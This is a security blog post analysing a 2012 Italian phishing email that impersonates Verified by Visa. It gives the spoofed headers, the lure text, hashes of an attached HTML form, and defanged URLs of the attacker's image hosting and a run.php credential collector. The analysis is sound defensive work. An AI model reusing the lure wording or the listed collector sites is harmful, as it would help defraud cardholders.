Tag Archives: visa phishing

Phishing: A causa del nostro recente aggiornamento. Verified by Visa

We have logged other phishing emails used to steal details of Visa users:

From - Mon Apr 23 16:04:50 2012
Received: from ser.just3d.tv (unknown [91.227.127.33])
Received: (qmail 23589 invoked by uid 0); 23 Apr 2012 13:21:36 -0000
Received: from unknown (HELO User) (admin@just3d.tv@151.58.16.184)
Reply-To: sicurela@visaltalia.it
From: "verified by visa" verified@visaitalia.com
Subject: A causa del nostro recente aggiornamento.
Date: Mon, 23 Apr 2012 15.21.34 +0200
To: undisclosed-recipients:;

Note from the email header the source of the message:

Received: from ser.just3d.tv (unknown [91.227.127.33])

It has nothing to do with Visa, and note also the emails:

Reply-To: sicurela@visaltalia.it

See the visaltalia.it is a l and not an i.

The message of the email:

Gentile Cliente, 
A causa del nostro recente aggiornamento sui nostri server 
(23/04/2012) e necessario aggiornare il tuo profilo. 
Per una maggiore sicurezza e di accesso, si prega di compilare il 
modulo allegato. 
 
Vi ringraziamo della vostra collaborazione. 
 
Copyright Visa Europe 2012. Tutti i diritti riservati

There is also an attached file named visaitalia.html:

File: visaitalia.html
Size: 20015 bytes
MD5: 2C76E9F667E78C8C32C09DBE1129969E
SHA1: 0A30FFC20AC311AF2831086D4B181E0F23483399
SHA256: 1757C6A066E61F1B3E9782570712641FC734E1C6ACCD1DA329F3B10B164136CC
SHA384: BD80E5B8A83A3C00D72B6367421AE85CC6A1FF8981F43D0D6784B52D0AAE58B22DD74293BD8735C8B0E4331C8CCCDA02
SHA512: 4B82AC139180E6B19C58A553456BBE30CE155E22A695E300115CAC5C8BDB3F84A024CCDF104E280162B0C44AF1495C850CA3565533DE62EC6F14EF7754295A30

The attached file contains the form used to send the typed details to a remote link. Listed below there are few malicious links extracted from the HTML attached file:

hxxp:// leonidasvancouver .com /admin/plm/plm.html
hxxp:// rottenfish .de /vbv/plm_files/Logo-Mastercard_Secure_Code.gif
hxxp:// rottenfish .de /vbv/plm_files/fin_VerifiedByVisa_186x79.gif
hxxp:// rottenfish .de /vbv/run.php

The malicious websites are classified as detected in URLVoid:

http://www.urlvoid.com/scan/rottenfish .de/
http://www.urlvoid.com/scan/leonidasvancouver .com/